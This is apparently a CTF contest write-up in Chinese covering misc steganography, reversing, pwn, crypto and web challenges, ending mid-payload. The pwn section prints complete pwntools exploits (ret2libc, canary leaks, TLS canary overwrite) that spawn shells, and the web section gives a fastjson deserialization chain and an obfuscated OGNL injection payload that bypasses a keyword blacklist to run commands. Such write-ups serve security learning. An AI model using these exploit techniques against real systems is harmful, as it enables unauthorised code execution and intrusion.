Posted Updated Research44 minutes read (About 6603 words)

智能网联汽车 天融信杯 信息安全攻防赛WP

日车车,进了决赛但是没钱去,所以推掉了,很麻

Misc

Easy! 23333!

010打开,发现504B跑到末尾去了,写个脚本反转一下

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
# encoding=utf-8
# author: ryu1nser
data_string = """
00 00 00 00 00 CA 00 00 00 5A 00 01 00 01 00 00
00 00 06 05 4B 50 01 D9 A7 51 7C 4C AA C0 01 D9
A7 52 28 67 6F 04 01 D9 A7 52 28 1F 0C 09 00 18
00 01 00 00 00 00 00 20 00 0A 74 78 74 2E 63 73
69 6D 00 00 00 00 00 00 00 20 00 00 00 00 00 00
00 24 00 08 00 00 03 D3 00 00 00 A4 E0 F5 F3 F8
56 D9 95 AF 00 08 00 00 00 14 00 14 02 01 4B 50
00 3E B7 FC 22 9E 64 A9 F8 26 23 AE D4 CE 5E 67
92 05 4E B5 C2 C4 24 81 3F 97 BE 4F BC B3 10 95
CC 3B 74 4C DC A3 E8 10 F1 59 A2 65 93 24 FC CC
4B F5 16 85 D9 75 74 3F 54 AF 6D B1 3F BB 2F 4E
29 67 61 53 2B 38 66 29 AC D9 68 A4 99 C6 85 94
AC 85 4C 2F AE 4B 72 0C 21 09 C7 99 B3 39 FA 33
3D 17 3A 0C 5E 9C C4 9D 2E 83 5F E8 AF DB 4E 34
5C 71 62 85 BA FB 3E 2E 4D 3A B7 ED 1E 7C FE A1
E2 42 3F 69 A8 A2 20 AE 02 C2 EE 0F 02 64 42 0E
82 67 7A 8B C5 E3 12 0D 74 75 D1 57 45 0C 20 80
0D C1 93 8D 74 78 74 2E 63 73 69 6D 00 00 00 08
00 00 03 D3 00 00 00 A4 E0 F5 F3 F8 56 D9 95 AF
00 08 00 00 00 14 04 03 4B 50
"""
data_string = data_string.replace("\n", "").replace(" ", "")
split_list = [data_string[i:i+2] for i in range(0, len(data_string), 2)]
reversed_list = split_list[::-1]
output_string = ' '.join(reversed_list[i] + reversed_list[i+1] for i in range(0, len(reversed_list), 2))
# 打印结果
print(output_string)

解压得到Just Kidding!,VSCode打开发现有宽0字符,直接解宽0即可

img

flag{maybe_you_kn0w_the_Unicode_Steganography}

这是隐写哦

下载音频后,拖到Audacity

img

猜测可能为LSB隐写,拖到Audio-Steganography解开得到PNG,Audio-Steganography脚本如下

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
import wave
import binascii

def decode():
    audio = wave.open("flag.wav", mode='rb')
    frame_bytes = bytearray(list(audio.readframes(audio.getnframes())))
    extracted = [frame_bytes[i] & 1 for i in range(len(frame_bytes))]
    binary_string = "".join(map(str, extracted))
    hex_string = hex(int(binary_string, 2))[2:]
    decoded = binascii.unhexlify(hex_string)

    with open("1.png", "wb") as file:
        file.write(decoded)

    audio.close()

decode()

得到的PNG为

img

谷歌搜图发现为Webdings字体

img

挨个对一下,得到flag

img

flag{8d9ad0457c1a8b603978085b0bffcf93}

数字游戏

首先解数独

img

到网站上解开后得到主对角线和次对角线为压缩包密码

654917276261618641

img

解开后得到key.txt和flag.txt

img

key.txt为Nonogram

1
2
[[7, 1, 1, 1, 1, 7], [1, 1, 2, 1, 1, 1, 1], [1, 3, 1, 2, 1, 2, 1, 3, 1], [1, 3, 1, 3, 1, 3, 1], [1, 3, 1, 2, 1, 1, 2, 1, 3, 1], [1, 1, 1, 1, 4, 1, 1], [7, 1, 1, 1, 1, 1, 7], [2], [1, 1, 1, 2, 4, 1, 2, 1], [2, 1, 1, 1, 2, 1, 2, 2, 1], [1, 2, 3, 6, 1, 2], [4, 1, 2, 7, 1, 1, 2], [1, 2, 3, 2, 1, 1], [1, 4, 3, 1, 3, 1, 1], [2, 2, 2, 2, 4, 1, 1], [3, 2, 2, 1, 1, 1, 1, 3], [1, 1, 2, 6, 1], [1, 4, 1, 2], [7, 1, 1, 2, 1, 3, 1], [1, 1, 3, 3, 3, 1], [1, 3, 1, 1, 7, 1], [1, 3, 1, 3, 5, 1], [1, 3, 1, 1, 1, 1, 1, 1], [1, 1, 2, 4, 2, 1, 2], [7, 3, 3, 1, 2, 1, 1]]
[[7, 1, 7, 7], [1, 1, 1, 1, 2, 1, 1], [1, 3, 1, 5, 1, 1, 3, 1], [1, 3, 1, 1, 5, 1, 3, 1], [1, 3, 1, 1, 3, 1, 3, 1], [1, 1, 4, 1, 1, 1], [7, 1, 1, 1, 1, 1, 7], [3, 1], [1, 3, 2, 1, 1, 1, 1, 1, 1], [2, 1, 1, 1, 3, 1, 4], [2, 1, 6, 1, 1, 1, 2], [2, 1, 3, 2, 1], [1, 1, 6, 2, 1], [1, 2, 4, 2, 1, 2], [1, 1, 2, 1, 3, 1, 1, 6], [5, 2, 1, 3, 3, 1, 1], [1, 5, 1, 1, 6, 2], [1, 2, 2], [7, 1, 2, 1, 1, 5], [1, 1, 4, 2, 1, 1, 2], [1, 3, 1, 1, 1, 7], [1, 3, 1, 3, 3, 3, 1], [1, 3, 1, 3, 1, 1, 3, 1, 1], [1, 1, 1, 1, 1], [7, 1, 1, 1, 5, 3]]

匹配一下坐标轴得到一个二维码,扫一下为flag.txt的密码

img

二维码密码为Take1tEasy

flag{c6ebcf84bcd54bac0803086a4630f673}

你也很困惑吗?

得到flag.zip,发现文件头尾为51 49 00 00 11 06,猜测是跟压缩包50 4B 03 04 14 00 01 00,进行异或

img

试了一下,有可能为十六进制逐字异或,写个脚本跑一下,在每次循环中,密钥值会递增1,并通过取模运算使其保持在0-255的范围内

img

img

1
2
3
4
5
6
f = open('flag.zip', 'rb')
# f1 = f.read(1)
t = f.read(1)
print((t[0] ^ 0x01))
t = f.read(1)
print((t[0] ^ 0x02))

根据这个逻辑写一下

1
2
3
4
5
6
7
8
9
10
f = open('flag.zip', 'rb')
f1 = open('flag111.zip', 'wb')
t = f.read(1)
xor = 0x01
while t:
    l = [t[0] ^ xor]
    # print((decoded))
    f1.write(bytes(l))
    t = f.read(1)
    xor = (xor + 1) % 256

得到

img

解压得到rox.png和xor.png,rox.png为假的flag

img

将xor.png和rox.png进行rgb通道异或

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
from PIL import Image
def xor_images(image1_path, image2_path, output_path):
    image1 = Image.open(image1_path)
    width, height = image1.size
    image2 = Image.open(image2_path)
    output_image = Image.new("RGB", (width, height))
    for x in range(width):
        for y in range(height):
            pixel1 = image1.getpixel((x, y))
            pixel2 = image2.getpixel((x, y))
            xor_pixel = (
                pixel1[0] ^ pixel2[0],  # R通道
                pixel1[1] ^ pixel2[1],  # G通道
                pixel1[2] ^ pixel2[2]   # B通道
            )
            output_image.putpixel((x, y), xor_pixel)
    output_image.save(output_path)
xor_images("rox.png", "xor.png", "output.png")

然后把得到的图片进行解盲水印,得到flag

img

得到

img

img

flag{AC4E331C-A2D0-CA2C-93D6-B9E22F19A373}

Re

Junk

把永恒跳转花指令去掉

img

img

img

rc4直接解密就行

flag{jUnkc0dE_C0oO00o0oo0ode}

Pwn

Easyguess

最基础的伪随机数了

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
from pwn import*
from ctypes import *
io = remote("123.127.164.29",27917)
elf = ELF("./pwn")
#libc = ELF("./libc.so.6")
libc = cdll.LoadLibrary('./libc.so.6')

def debug():
    gdb.attach(io)
    pause()

libc.srand(0)
io.recvuntil("You have three times")
for i in range(3):
    buf = libc.rand()
    io.sendline(str(buf))
io.recvuntil("right! You get a chance to pwn it!")
system_addr = 0x80483e0
binsh_addr = 0x8049A30
payload = cyclic(0x1c+0x4)+p32(system_addr)+p32(0)+p32(binsh_addr)
io.sendline(payload)
io.interactive()

timemaster

img

img

可以通过%lf泄漏金丝雀

不过是浮点数,需要转bytes

有了金丝雀之后直接rop,常规的ret2libc

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
from pwn import *
import struct


io = remote("123.127.164.29",27902)
elf = ELF("pwn")
libc = ELF("./libc-2.31.so")
io.recvuntil("What is your name?\n> ")
io.sendline("xiaobin")
io.recvuntil("How many times do you want to try?\n> ")
io.sendline("16")
io.recvuntil("Time[sec]: ")
io.sendline("xiaobin")

io.recvuntil("Stop the timer as close to ")
canary = io.recvuntil(" ")[:-1]
canary = struct.pack("<d", float(canary))
io.sendline("\n")

puts_got = elf.got['puts']
puts_plt = elf.plt['puts']
rdi_addr =0x400e93
io.recvuntil("Play again? (Y/n) ")
payload = b'n'*0x18+canary+p64(0)+p64(rdi_addr)+p64(puts_got)+p64(puts_plt)+p64(0x0040089B)

puts_addr = u64(io.recvline()[:-1].ljust(8, b"\x00"))


libc_base =puts_addr - libc.symbols['puts']

io.recvuntil("Play again? (Y/n) ")
binsh_addr = libc_base + next(libc.search(b"/bin/sh"))
system_addr = libc_base + libc.symbols["system"]
payload = b'n'*0x18+canary+p64(0)+p64(rdi_addr)+p64(binsh_addr)+p64(system_addr)
io.sendline(payload)

io.interactive()

Guess

img

本题利用pthread开启了一个新的线程 并且存在gets溢出 由于pthread创建线程的特殊性 导致新的栈帧空间会跑到libc地址上 并且距离tls结构体只有几百个字节 而canary的check是通过tls结构体上的canary来的 所以通过溢出覆盖即可绕过canary 而由于开启了PIE 所以我们还需要泄露elf基址 经过动调发现Enter your guess的时候 如果输入字母导致scanf接收到的为空 就可以泄露elf基地址

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
from pwn import*

io = remote("123.127.164.29",27917)
elf = ELF("./pwn")
libc = ELF("./libc-2.31.so")




io.recvuntil("Enter the size : ")
io.sendline(b'1')
io.recvuntil("Enter the number of tries : ")
io.sendline(b'1')
io.recvuntil("Enter your guess : ")

io.sendline(b'c')

io.recvuntil("You entered ")
elf_addr = int(io.recvuntil(" ",drop = True),10)-0x1579
success("elf_addr :"+hex(elf_addr))
io.recvuntil("But maybe a threaded win can help?")
puts_got = elf_addr + elf.got['puts']
puts_plt = elf_addr + elf.sym['puts']
rdi_addr = elf_addr+0x0000000000001793
back_addr = elf_addr + 0x1436
ret_addr = elf_addr + 0x000000000000101a
payload = cyclic(0x18)+p64(0x100)+cyclic(0x8)+p64(rdi_addr)+p64(puts_got)+p64(puts_plt)+p64(back_addr)
payload = payload.ljust(0x858,b'\x00')+p64(0x100)

io.sendline(payload)

libc_addr = u64(io.recvuntil("\x7f")[-6:].ljust(8,b'\x00'))-libc.sym['puts']
success("libc_addr :"+hex(libc_addr))
system_addr = libc_addr + libc.sym['system']
binsh_addr = libc_addr + next(libc.search(b"/bin/sh"))
rsi_addr = libc_addr + 0x000000000002604f
rdx_r12_addr = libc_addr + 0x0000000000119241
read_addr = libc_addr + libc.sym['read']
rax_addr = libc_addr + 0x0000000000047400
syscall_addr = read_addr + 0x10
io.recvuntil("> ")
payload = cyclic(0x18)+p64(0x100)+cyclic(0x8)+p64(rax_addr)+p64(59)+p64(rdi_addr)+p64(binsh_addr)+p64(rsi_addr)+p64(0)+p64(syscall_addr)

io.sendline(payload)

io.interactive()

Crypto

easybog

构建一个 lattice,定义块矩阵,插入p和c,然后直接利用格基规约算法,去找最短向量,可以发现第一行的相反向量就是解

img

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
p = 85766816683407427477074053090759168259205489535331001301483049660772943816017
pubkey = [58890813098389592716367918664418237809399998613202441049117852003453550490043, 255886907973292033549191761914277947638378726729170162403000263307778539588, 43666147543837562983744529128391108960442814393989688186615627619841168438881, 2289339843351034938706095739069649849491797527322909177303809837660115875707, 41213482604182795008139260226694469358720652561587117539105919206178583341309, 85123975988270149359269904030278272256150702593339117634318036869051474541673, 38499515653492727036642516425661144597669644770181333309684190745152037999340, 20485509602350760468364550436683434882775269798789922529010411809186809838027, 66201868699675751260618542402171897519442339400362102112029773068389836772496, 5928498980938052035989976608996334019121526162545586177960440867589564370967, 50886730626726574520144515855606763616811548330471900085065588158010347676677, 64024533350992434764550819938965710849249693930938822302806256939206336927327, 38725701074483250591450474606717766666514853596721960873869603150079957176979, 79217343443391443055559755031159399927770013676937883189341106207746097977107, 61550584018851036114215415812034871024308694207855706560554908679054705909070, 18943452821091669663831772224349497605704279324611723330470460453532875854668, 19589987578009659601683539978459498259975975776374959927024576839483511789830, 30455762424330442645213719258885752997650973641135913878741104126501286615202, 58949965807078946897782791856062155685595594220625894016492979510745067947620, 62055731853485887582338078878228949009560282473783423335829652944841334703073, 9968050471897160901950463089357618812125361692340159762344476181267684171496, 82879622776859731032127240994822860125030485017752550449574280896284319539559, 4801338348200265259854446071344823901330707085102509710655971928319789477063, 45731791006706217374257923546738746982354369452894895184784691821888225473116, 67249651561046962535594292263727781436622305014470811080407605464069397278541, 74549581000796086938735007821116567870037873934415647996983670510761843574950, 53927163931460713770577528602376533863752551014779597870421933008696943680646, 56674817179749773825254339411582187056553125580899575215919582277873475282705, 46486618405288541635832334168373891479516241585245833202819962034096805786948, 33438500041468604615663063367413201369385488295864836452725688027946579037027, 67664099966578778667405575319488959391557099474146663546553930271609270514413, 45447815671440655615043306804023843286416205143693188321756314646855229497538, 11725972638697133812198141962081533057131109523301554105107846876476492922863, 64289489702331472745122326714411510149286883423778995697545620572730495023564, 57994575257987111046854716965859364231330618527165005046088441624813910607490, 14668229647185139513680523686559656096579435616501772089580139136432744069528, 17932811002316804580991874481669739042847138206519622106023735880404179858139, 5331195663859739712428554823168168360812478289288952467823046758773036202890, 74552793814948855649083379813894922159371588934498467412076815493098565156965, 44935994020454630627073800850452460158487760266394408710221643505798360283738, 56729956460199305019441584184914729272661532037080935244087594435220086006307, 62039396792619765440106521363503635264208869754554560630026111496679072778122, 2393458745997765849524009470841489934632527663821258015836036776013536950950, 35915327454351624449823951016325751779776476237317012289496757290655725512173, 32606524479615026657452402620774183996842863618201886022072527830448469143354, 63235637104235763521471020678482591762365962539497201272446150774560661623146, 62208964066864651499810642926855154855961192109426476051220581622874074871556, 56823425142073561606336827683244447153122191299012994793162957373419782442861, 60885675233604760515790987357657130734130927344692532134660791434444881730069, 70128263220978378037998154126965802527577393332688627564386146841574995052881, 71018980922731664798406835410011497130959699315348431777949257381109611662531, 12143164079299710577697191074655687226341720767219380493916347970636555672200, 13508918371738967514239962849170666297725816564248068619597724335815422874867, 35455956156846758401498039994914987477656410741995261921339242861566953715810, 69980758495467248406706658186358315365421963514406314839633132920772753269590, 40780609781497584108689952068487274243081363044494223353377248536197342087646, 44867942499383360300066493293729414921480295687316596135570022888723461284905, 82725154870798626926322339306353417520587153667878451856611421219700157524903, 25126631681527477467395254546272084567454410334950820629891182857858739056234, 6951466886617047161399523857762365328179011042304277010521273986635895511090, 76348861623318422648322072872825713398471251831589343473949016976971223635877, 56205107190224957419682681113714452084261733562014707901087589292788540501506, 18117892543394976645523077630904329147251317704285881519049138075260678609853, 44808031105096301006447146332872279574072682041430481888991436113801413524922, 49253422883319286749223459668126849556879848229728760990408851547046135426202, 84189814930926817953967035166781168797567323089104013113646102708978330223462, 47137140069594189485896203757476808738350291684312377044596204628988007490802, 40801572088832002265546622948401731702850273201235765228409527972304470614013, 66031049946459598112632104872606456117378438456948859102185817862671625118362, 81720181560222737179789740743588444616843925127263616533094516919384531350798, 22799062566507850812703708400514738660780510100747243720001217935586864713536, 19636898235593770858368519750634152409107475396982151534080287393055054087250, 29019136605948188309201641456999919579306004440518777086603961225647602320689, 79880698495154758609432245210109366091585969807890967815410904513080769679673, 9333444307040962156247586346311311869921891214405652789959336947220586492578, 5389291816105059661723219597627983160117906098832235782666626188832333763452, 80140247201709476779769310874536378021073864035213177889595402673752593492257, 10265989744904418075184606188771633319731922237097882332727796873595806941649, 28947186543573208323555611612621027283989204690818732739083074045376664847781, 76665830939598023116888796550932971936723367285838797618563918377195976634315]
c = 1381426073179447662111620044316177635969142117258054810267264948634812447218


E = [1]*81 + [2**20]
D = diagonal_matrix(E) #定义单位对角矩阵
M = matrix(ZZ,[[0]*80,pubkey]).T
M = block_matrix([[2,L]]) #定义块矩阵
M = M.insert_row(80,[0]*81+[p]) #插入p
M = M.insert_row(81,[1]*81+[c]) #插入c
M *= D
MA = M.LLL() #最短正交基
MA /= D

binary = ""
for i in range(80):
    if MA[0][i]==-1:
        binary+="1"
    else:
        binary+="0"
print(hex(int(binary,2)))

Web

expr

题目直接给jar包,代码审计发现存在反序列化,但题目没有可以直接利用的链不过存在一个fastjson,然后给了一个User类存在以下关键内容:

img

发现这里存在一个ognl表达式注入漏洞,但是有filter函数过滤,过滤的内容也比较多。所以整理一下思路可知 1.需要调用到getResult方法 2.利用ognl表达式执行命令。

因为fastjson的toString方法可以实现任意getter调用的效果,通过这个点我们就可以调用到getResult方法,所以可以构造

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
import com.alibaba.fastjson.JSONArray;
import com.ctf.expr.entity.User;
import ognl.Ognl;
import ognl.OgnlContext;

import javax.management.BadAttributeValueExpException;
import java.io.ByteArrayOutputStream;
import java.io.ObjectOutputStream;
import java.lang.reflect.Field;
import java.util.Base64;

public class Exp {
    public static void main(String[] args) throws Exception {
        String exp = "";
        User u = new User("aaaaaa","aaaaaaa",exp);
        JSONArray jsonArray= new JSONArray();
        jsonArray.add(u);
        BadAttributeValueExpException attributeValueExpException = new BadAttributeValueExpException(null);
        Class<?> badAttributeValueExpException = Class.forName("javax.management.BadAttributeValueExpException");
        Field val = badAttributeValueExpException.getDeclaredField("val");
        val.setAccessible(true);
        val.set(attributeValueExpException,jsonArray);
        ByteArrayOutputStream byteArrayOutputStream = new ByteArrayOutputStream();
        ObjectOutputStream objectOutputStream = new ObjectOutputStream(byteArrayOutputStream);
        objectOutputStream.writeObject(attributeValueExpException);
        objectOutputStream.close();
        System.out.println(Base64.getEncoder().encodeToString(byteArrayOutputStream.toByteArray()));
  }
}

然后接下来构造绕过filter函数的ognl表达式注入,因为过滤了以下东西:

1
2
3
String[] BlackList = { 
    "\"", "'", "\\u", "invoke", "getClass", "\\x", "$", "{", "}", "@", 
    "js", "getRuntime", "java", "script", "ProcessBuilder", "start", "flag" };

特别是'"都不能够使用了,那么只能思考有没有类似于chr函数的方式构造出字符然后连接起来绕过关键字的过滤。

通过查找手册发现toChars()可以将数字转为字符,但这个函数在java.lang.Character类下,所以得构造出该类。经过本地调试发现对字符串调用charAt()函数就可以得到java.lang.Character

img

通过这个思路我们就可以构造出任意字符,如下:

img

然后我们还可以使用聚合函数concat将每个字符聚合到一起,这样就可以绕过关键字过滤,如下:

img

但是因为不存在双引号,所以我们需要重复调用true.toString().charAt(0).toChars(106)[0] 来构造字符,如下:

img

所以我们可以构造这种方式来绕过黑名单实现ognl注入,构造以下的函数来方便生成payload:

1
2
3
4
5
def bypassFilter(payload):
    exp = "true.toString().charAt(0).toChars(%d)[0].toString()" % ord(payload[0])
    for i in range(1, len(payload)):
        exp=exp+".concat(true.toString().charAt(0).toChars(%d)[0].toString())" % ord(payload[i])
    return exp

由于在IndexController位置存在以下代码可知页面是有回显的,所以我们利用ognl注入执行命令获取到flag并以字符串的方式返回。

img

那么可以构造生成以下payload:

1
"true.class.forName(%s).newInstance().getEngineByName(%s).eval(%s)" % (bypassFilter('javax.script.ScriptEngineManager'),bypassFilter('nashorn'),bypassFilter("\"'\"+(new java.io.BufferedReader(new java.io.InputStreamReader(new java.lang.ProcessBuilder(\"cat\",\"/flag\").start().getInputStream(), \"GBK\")).readLine())+\"'\""))

最后的构造结果为

1
true.class.forName(true.toString().charAt(0).toChars(106)[0].toString().concat(true.toString().charAt(0).toChars(97)[0].toString()).concat(true.toString().charAt(0).toChars(118)[0].toString()).concat(true.toString().charAt(0).toChars(97)[0].toString()).concat(true.toString().charAt(0).toChars(120)[0].toString()).concat(true.toString().charAt(0).toChars(46)[0].toString()).concat(true.toString().charAt(0).toChars(115)[0].toString()).concat(true.toString().charAt(0).toChars(99)[0].toString()).concat(true.toString().charAt(0).toChars(114)[0].toString()).concat(true.toString().charAt(0).toChars(105)[0].toString()).concat(true.toString().charAt(0).toChars(112)[0].toString()).concat(true.toString().charAt(0).toChars(116)[0].toString()).concat(true.toString().charAt(0).toChars(46)[0].toString()).concat(true.toString().charAt(0).toChars(83)[0].toString()).concat(true.toString().charAt(0).toChars(99)[0].toString()).concat(true.toString().charAt(0).toChars(114)[0].toString()).concat(true.toString().charAt(0).toChars(105)[0].toString()).concat(true.toString().charAt(0).toChars(112)[0].toString()).concat(true.toString().charAt(0).toChars(116)[0].toString()).concat(true.toString().charAt(0).toChars(69)[0].toString()).concat(true.toString().charAt(0).toChars(110)[0].toString()).concat(true.toString().charAt(0).toChars(103)[0].toString()).concat(true.toString().charAt(0).toChars(105)[0].toString()).concat(true.toString().charAt(0).toChars(110)[0].toString()).concat(true.toString().charAt(0).toChars(101)[0].toString()).concat(true.toString().charAt(0).toChars(77)[0].toString()).concat(true.toString().charAt(0).toChars(97)[0].toString()).concat(true.toString().charAt(0).toChars(110)[0].toString()).concat(true.toString().charAt(0).toChars(97)[0].toString()).concat(true.toString().charAt(0).toChars(103)[0].toString()).concat(true.toString().charAt(0).toChars(101)[0].toString()).concat(true.toString().charAt(0).toChars(114)[0].toString())).newInstance().getEngineByName(true.toString().charAt(0).toChars(110)[0].toString().concat(true.toString().charAt(0).toChars(97)[0].toString()).concat(true.toString().charAt(0).toChars(115)[0].toString()).concat(true.toString().charAt(0).toChars(104)[0].toString()).concat(true.toString().charAt(0).toChars(111)[0].toString()).concat(true.toString().charAt(0).toChars(114)[0].toString()).concat(true.toString().charAt(0).toChars(110)[0].toString())).eval(true.toString().charAt(0).toChars(110)[0].toString().concat(true.toString().charAt(0).toChars(101)[0].toString()).concat(true.toString().charAt(0).toChars(119)[0].toString()).concat(true.toString().charAt(0).toChars(32)[0].toString()).concat(true.toString().charAt(0).toChars(106)[0].toString()).concat(true.toString().charAt(0).toChars(97)[0].toString()).concat(true.toString().charAt(0).toChars(118)[0].toString()).concat(true.toString().charAt(0).toChars(97)[0].toString()).concat(true.toString().charAt(0).toChars(46)[0].toString()).concat(true.toString().charAt(0).toChars(105)[0].toString()).concat(true.toString().charAt(0).toChars(111)[0].toString()).concat(true.toString().charAt(0).toChars(46)[0].toString()).concat(true.toString().charAt(0).toChars(66)[0].toString()).concat(true.toString().charAt(0).toChars(117)[0].toString()).concat(true.toString().charAt(0).toChars(102)[0].toString()).concat(true.toString().charAt(0).toChars(102)[0].toString()).concat(true.toString().charAt(0).toChars(101)[0].toString()).concat(true.toString().charAt(0).toChars(114)[0].toString()).concat(true.toString().charAt(0).toChars(101)[0].toString()).concat(true.toString().charAt(0).toChars(100)[0].toString()).concat(true.toString().charAt(0).toChars(82)[0].toString()).concat(true.toString().charAt(0).toChars(101)[0].toString()).concat(true.toString().charAt(0).toChars(97)[0].toString()).concat(true.toString().charAt(0).toChars(100)[0].toString()).concat(true.toString().charAt(0).toChars(101)[0].toString()).concat(true.toString().charAt(0).toChars(114)[0].toString()).concat(true.toString().charAt(0).toChars(40)[0].toString()).concat(true.toString().charAt(0).toChars(110)[0].toString()).concat(true.toString().charAt(0).toChars(101)[0].toString()).concat(true.toString().charAt(0).toChars(119)[0].toString()).concat(true.toString().charAt(0).toChars(32)[0].toString()).concat(true.toString().charAt(0).toChars(106)[0].toString()).concat(true.toString().charAt(0).toChars(97)[0].toString()).concat(true.toString().charAt(0).toChars(118)[0].toString()).concat(true.toString().charAt(0).toChars(97)[0].toString()).concat(true.toString().charAt(0).toChars(46)[0].toString()).concat(true.toString().charAt(0).toChars(105)[0].toString()).concat(true.toString().charAt(0).toChars(111)[0].toString()).concat(true.toString().charAt(0).toChars(46)[0].toString()).concat(true.toString().charAt(0).toChars(73)[0].toString()).concat(true.toString().charAt(0).toChars(110)[0].toString()).concat(true.toString().charAt(0).toChars(112)[0].toString()).concat(true.toString().charAt(0).toChars(117)[0].toString()).concat(true.toString().charAt(0).toChars(116)[0].toString()).concat(true.toString().charAt(0).toChars(83)[0].toString()).concat(true.toString().charAt(0).toChars(116)[0].toString()).concat(true.toString().charAt(0).toChars(114)[0].toString()).concat(true.toString().charAt(0).toChars(101)[0].toString()).concat(true.toString().charAt(0).toChars(97)[0].toString()).concat(true.toString().charAt(0).toChars(109)[0].toString()).concat(true.toString().charAt(0).toChars(82)[0].toString()).concat(true.toString().charAt(0).toChars(101)[0].toString()).concat(true.toString().charAt(0).toChars(97)[0].toString()).concat(true.toString().charAt(0).toChars(100)[0].toString()).concat(true.toString().charAt(0).toChars(101)[0].toString()).concat(true.toString().charAt(0).toChars(114)[0].toString()).concat(true.toString().charAt(0).toChars(40)[0].toString()).concat(true.toString().charAt(0).toChars(110)[0].toString()).concat(true.toString().charAt(0).toChars(101)[0].toString()).concat(true.toString().charAt(0).toChars(119)[0].toString()).concat(true.toString().charAt(0).toChars(32)[0].toString()).concat(true.toString().charAt(0).toChars(106)[0].toString()).concat(true.toString().charAt(0).toChars(97)[0].toString()).concat(true.toString().charAt(0).toChars(118)[0].toString()).concat(true.toString().charAt(0).toChars(97)[0].toString()).concat(true.toString().charAt(0).toChars(46)[0].toString()).concat(true.toString().charAt(0).toChars(108)[0].toString()).concat(true.toString().charAt(0).toChars(97)[0].toString()).concat(true.toString().charAt(0).toChars(110)[0].toString()).concat(true.toString().charAt(0).toChars(103)[0].toString()).concat(true.toString().charAt(0).toChars(46)[0].toString()).concat(true.toString().charAt(0).toChars(80)[0].toString()).concat(true.toString().charAt(0).toChars(114)[0].toString()).concat(true.toString().charAt(0).toChars(111)[0].toString()).concat(true.toString().charAt(0).toChars(99)[0].toString()).concat(true.toString().charAt(0).toChars(101)[0].toString()).concat(true.toString().charAt(0).toChars(115)[0].toString()).concat(true.toString().charAt(0).toChars(115)[0].toString()).concat(true.toString().charAt(0).toChars(66)[0].toString()).concat(true.toString().charAt(0).toChars(117)[0].toString()).concat(true.toString().charAt(0).toChars(105)[0].toString()).concat(true.toString().charAt(0).toChars(108)[0].toString()).concat(true.toString().charAt(0).toChars(100)[0].toString()).concat(true.toString().charAt(0).toChars(101)[0].toString()).concat(true.toString().charAt(0).toChars(114)[0].toString()).concat(true.toString().charAt(0).toChars(40)[0].toString()).concat(true.toString().charAt(0).toChars(34)[0].toString()).concat(true.toString().charAt(0).toChars(99)[0].toString()).concat(true.toString().charAt(0).toChars(97)[0].toString()).concat(true.toString().charAt(0).toChars(116)[0].toString()).concat(true.toString().charAt(0).toChars(34)[0].toString()).concat(true.toString().charAt(0).toChars(44)[0].toString()).concat(true.toString().charAt(0).toChars(32)[0].toString()).concat(true.toString().charAt(0).toChars(34)[0].toString()).concat(true.toString().charAt(0).toChars(47)[0].toString()).concat(true.toString().charAt(0).toChars(102)[0].toString()).concat(true.toString().charAt(0).toChars(108)[0].toString()).concat(true.toString().charAt(0).toChars(97)[0].toString()).concat(true.toString().charAt(0).toChars(103)[0].toString()).concat(true.toString().charAt(0).toChars(34)[0].toString()).concat(true.toString().charAt(0).toChars(41)[0].toString()).concat(true.toString().charAt(0).toChars(46)[0].toString()).concat(true.toString().charAt(0).toChars(115)[0].toString()).concat(true.toString().charAt(0).toChars(116)[0].toString()).concat(true.toString().charAt(0).toChars(97)[0].toString()).concat(true.toString().charAt(0).toChars(114)[0].toString()).concat(true.toString().charAt(0).toChars(116)[0].toString()).concat(true.toString().charAt(0).toChars(40)[0].toString()).concat(true.toString().charAt(0).toChars(41)[0].toString()).concat(true.toString().charAt(0).toChars(46)[0].toString()).concat(true.toString().charAt(0).toChars(103)[0].toString()).concat(true.toString().charAt(0).toChars(101)[0].toString()).concat(true.toString().charAt(0).toChars(116)[0].toString()).concat(true.toString().charAt(0).toChars(73)[0].toString()).concat(true.toString().charAt(0).toChars(110)[0].toString()).concat(true.toString().charAt(0).toChars(112)[0].toString()).concat(true.toString().charAt(0).toChars(117)[0].toString()).concat(true.toString().charAt(0).toChars(116)[0].toString()).concat(true.toString().charAt(0).toChars(83)[0].toString()).concat(true.toString().charAt(0).toChars(116)[0].toString()).concat(true.toString().charAt(0).toChars(114)[0].toString()).concat(true.toString().charAt(0).toChars(101)[0].toString()).concat(true.toString().charAt(0).toChars(97)[0].toString()).concat(true.toString().charAt(0).toChars(109)[0].toString()).concat(true.toString().charAt(0).toChars(40)[0].toString()).concat(true.toString().charAt(0).toChars(41)[0].toString()).concat(true.toString().charAt(0).toChars(44)[0].toString()).concat(true.toString().charAt(0).toChars(32)[0].toString()).concat(true.toString().charAt(0).toChars(106)[0].toString()).concat(true.toString().charAt(0).toChars(97)[0].toString()).concat(true.toString().charAt(0).toChars(118)[0].toString()).concat(true.toString().charAt(0).toChars(97)[0].toString()).concat(true.toString().charAt(0).toChars(46)[0].toString()).concat(true.toString().charAt(0).toChars(110)[0].toString()).concat(true.toString().charAt(0).toChars(105)[0].toString()).concat(true.toString().charAt(0).toChars(111)[0].toString()).concat(true.toString().charAt(0).toChars(46)[0].toString()).concat(true.toString().charAt(0).toChars(99)[0].toString()).concat(true.toString().charAt(0).toChars(104)[0].toString()).concat(true.toString().charAt(0).toChars(97)[0].toString()).concat(true.toString().charAt(0).toChars(114)[0].toString()).concat(true.toString().charAt(0).toChars(115)[0].toString()).concat(true.toString().charAt(0).toChars(101)[0].toString()).concat(true.toString().charAt(0).toChars(116)[0].toString()).concat(true.toString().charAt(0).toChars(46)[0].toString()).concat(true.toString().charAt(0).toChars(83)[0].toString()).concat(true.toString().charAt(0).toChars(116)[0].toString()).concat(true.toString().charAt(0).toChars(97)[0].toString()).concat(true.toString().charAt(0).toChars(110)